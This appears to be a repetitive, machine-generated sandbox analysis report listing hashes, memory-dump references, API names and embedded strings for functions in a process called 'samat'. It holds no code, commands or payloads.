                                                                                                                                                                                                                                                                                      • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                                                                      • Instruction ID: 1bde7abaf74e265acf9910cc2706a8260ceb2c6d66cd1714166ae8b7dbc88686
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B819673F0824285E764BF25C9023B8B6A89B15B4CFD54037CA1997295CBBDE503932F
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                                                      • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                                                      • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                                                                      • Instruction ID: a41aad11e155a191a89aba095d5a602d812d26114f03c9bc50745866e9447eee
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9051D032B196468BDB18EB15E805B39B399EB44B88F908132DB4E57744DFBCE841C791
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                                                      • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                                                                      • Instruction ID: 7dca480201d23c5cc3b86cc1976281541331fd4fa52ef37d07f15c7c6497111e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E519072B0868286EB74AB21D8463A8F7A8FB55B84F944137DB4C43B85CFBCE450C716
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                                                      • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                                                                      • Instruction ID: 4f4acf3db6a1496d3ccb50d3957312152144630ee5cc2409c2be93bbd7d7be7a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4461A532A08BC586D730AB15E8413EAF7A4FB85B84F444226EB9C13B59DFBCD190CB11
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,?,00007FF7E12C352C,?,00000000,00007FF7E12C3F23), ref: 00007FF7E12C7F32
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateDirectory
                                                                                                                                                                                                                                                                                      • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                                                      • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                                                      • Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                                                                      • Instruction ID: 9a4e7b05101842aef7faa12c2d713a7c4cedb021190bbde38b64aaf5e32ed831
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1431C321719AC645EB61AB20EC523EAA258EF84BE0F844232EB6D477C9DE7CD601C711
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_Err_ParseStringTuple
                                                                                                                                                                                                                                                                                      • String ID: iiiiiiiii|i$year out of range
                                                                                                                                                                                                                                                                                      • API String ID: 385655187-1001734015
                                                                                                                                                                                                                                                                                      • Opcode ID: a393630f01c1ab398363936785eebc4b854c9c0a34006ea8152fcf8c0a72c652
                                                                                                                                                                                                                                                                                      • Instruction ID: a6c303b62bf518a9ce2725ff93a6b0ed7f1fda7ad3fb6158596e75e14217983f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a393630f01c1ab398363936785eebc4b854c9c0a34006ea8152fcf8c0a72c652
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B318FB2A18B4586E304CF28D4445AC33A5FB48FC4B95823ADBAD47721DF3ED9A5C740
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Timefloor$SystemVariant
                                                                                                                                                                                                                                                                                      • String ID: VariantTimeToSystemTime
                                                                                                                                                                                                                                                                                      • API String ID: 1266533630-2676162551
                                                                                                                                                                                                                                                                                      • Opcode ID: a465e119b1e8654e6b17b5d4bd19b62b8ede92bf3e9ff217748a048bfc1d5ad1
                                                                                                                                                                                                                                                                                      • Instruction ID: e842080da1dab50c1015e9c1da7f952adf0c2aeb2add3c008c487fe1c4f4eb84
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a465e119b1e8654e6b17b5d4bd19b62b8ede92bf3e9ff217748a048bfc1d5ad1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A731B552C2CF5588E243877998510A9F3697FAABC9B448333FA4F72536EF3CA0D24600
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message
                                                                                                                                                                                                                                                                                      • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                                      • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                                                      • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                                                                      • Instruction ID: c20c5bac15e93646483ef002f2ef816c3de1d88c6d6b17bdf81f9a4ea31eda03
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0921AE62B08B4182E711AB24F8467EAA3A8FB88780F804137EE8D93759DF7CD255C751
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_ParseTuple
                                                                                                                                                                                                                                                                                      • String ID: OiOOi(ii):MSG param$The object is not a PyHANDLE object
                                                                                                                                                                                                                                                                                      • API String ID: 3371842430-2297966167
                                                                                                                                                                                                                                                                                      • Opcode ID: 1aef02047203e126fbad942446429c40e2ebc0da5cb29cf657f2d8b5da010051
                                                                                                                                                                                                                                                                                      • Instruction ID: dc29acba1d294c31470abd4c0cf8ddf284260699f6cf276b69ce27bc0dd40c22
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1aef02047203e126fbad942446429c40e2ebc0da5cb29cf657f2d8b5da010051
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D21E772A08B0691EB018B19D4401AD63AAFF48BC4F944132DB5D472A5EE3CE996D750
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_InitializeParseTuple
                                                                                                                                                                                                                                                                                      • String ID: (bbbbbb)b:Initialize$InitializeSid
                                                                                                                                                                                                                                                                                      • API String ID: 1991639834-750340051
                                                                                                                                                                                                                                                                                      • Opcode ID: 8f93dc5897869b6e6d762fe8350b58cad0134a8ca8a8ee9a4feec80ce2d05c27
                                                                                                                                                                                                                                                                                      • Instruction ID: a0c55f9974a85b6a227ca7e27b85d320a69c082726fa27bedd11a5316502db4a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f93dc5897869b6e6d762fe8350b58cad0134a8ca8a8ee9a4feec80ce2d05c27
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10215932B1CB4686EB40DB69E4550BD33A1BF88B84F860036DB6E47762DE3DD959C710
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_DeleteParseTuple
                                                                                                                                                                                                                                                                                      • String ID: DeleteAce$l:DeleteAce
                                                                                                                                                                                                                                                                                      • API String ID: 1230908747-3702189175
                                                                                                                                                                                                                                                                                      • Opcode ID: e9fd5093a37588dd38093529aa320f1bd4afb36f3cc09021ea466ad982abeb09
                                                                                                                                                                                                                                                                                      • Instruction ID: 3ca23b795a9d1bd7b2fc1cbf720fa132917630eee389c4003a96bcbaf36d1ceb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e9fd5093a37588dd38093529aa320f1bd4afb36f3cc09021ea466ad982abeb09
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4011F166A1978247EB464B6DA4501BD3B70AF89F84B488072DB8D82362DA3CA4A6D700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • DEVMODE structure of size %d greater than supported size of %d, xrefs: 00007FF8B7E84ED6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                                                                                                      • String ID: DEVMODE structure of size %d greater than supported size of %d
                                                                                                                                                                                                                                                                                      • API String ID: 376477240-1470040908
                                                                                                                                                                                                                                                                                      • Opcode ID: b8ecc243b236786a1011e640928dcb070ff00ad600dd3a87fa9598167f5ce84a
                                                                                                                                                                                                                                                                                      • Instruction ID: ee5ff3ab755ec07d9d7d71559d5b5f03fef1d17022f85acfce6428f1ddcdb8e9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8ecc243b236786a1011e640928dcb070ff00ad600dd3a87fa9598167f5ce84a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D112E62E1570286FB149F5EE45427C2290EF89FC4F845035DB0D8B7B2DE3CE4918750
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_DescriptorOwnerParseSecurityTuple
                                                                                                                                                                                                                                                                                      • String ID: :GetSecurityDescriptorOwner$GetSecurityDescriptorOwner
                                                                                                                                                                                                                                                                                      • API String ID: 2338322640-1512101531
                                                                                                                                                                                                                                                                                      • Opcode ID: 0535b539f90f532cb0c8c7548f6890f1e389f6ab6250c068e08cb84b90928d65
                                                                                                                                                                                                                                                                                      • Instruction ID: 194facdb46b3ee8d1ff80f1aa688226621e688f2dd35fcf0daca90811ca4ec7f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0535b539f90f532cb0c8c7548f6890f1e389f6ab6250c068e08cb84b90928d65
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0001F762E28B0682FB549BAAA85027D22A1AF85FC4F845035DB0D477B6EE3CD995C700
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: CloseHandle$The object is not a PyHANDLE object
                                                                                                                                                                                                                                                                                      • API String ID: 0-4264222050
                                                                                                                                                                                                                                                                                      • Opcode ID: dc318d2b1349d4a50ab063cf74b006e41aa0c775c8383e0438a78d5d1f98fbfa
                                                                                                                                                                                                                                                                                      • Instruction ID: 45eece54bec16efe2fdc444c4db198fdf9de76abc6cee70bdb8980b064ad5f2b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc318d2b1349d4a50ab063cf74b006e41aa0c775c8383e0438a78d5d1f98fbfa
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C111F22B19B02C2EB509B5DD89007D23A0FF88FD4F844132D71D866B2EE3CD9558300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_CreateGuidParseReferenceTuple
                                                                                                                                                                                                                                                                                      • String ID: :CreateGuid
                                                                                                                                                                                                                                                                                      • API String ID: 1283042906-3559396464
                                                                                                                                                                                                                                                                                      • Opcode ID: 406caab003073a4f77f67d61481f4c1e26270bd55b296c2a684b999cc2a37536
                                                                                                                                                                                                                                                                                      • Instruction ID: 6a1787839154b5be36ed1ba2fafd7d32fd036a1be0046bea7985c74a5696ce48
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 406caab003073a4f77f67d61481f4c1e26270bd55b296c2a684b999cc2a37536
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1014C66A08B4285FB409B69E85116D73A0FF89FD4F841135EB4E46376EF3CE1948B00
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
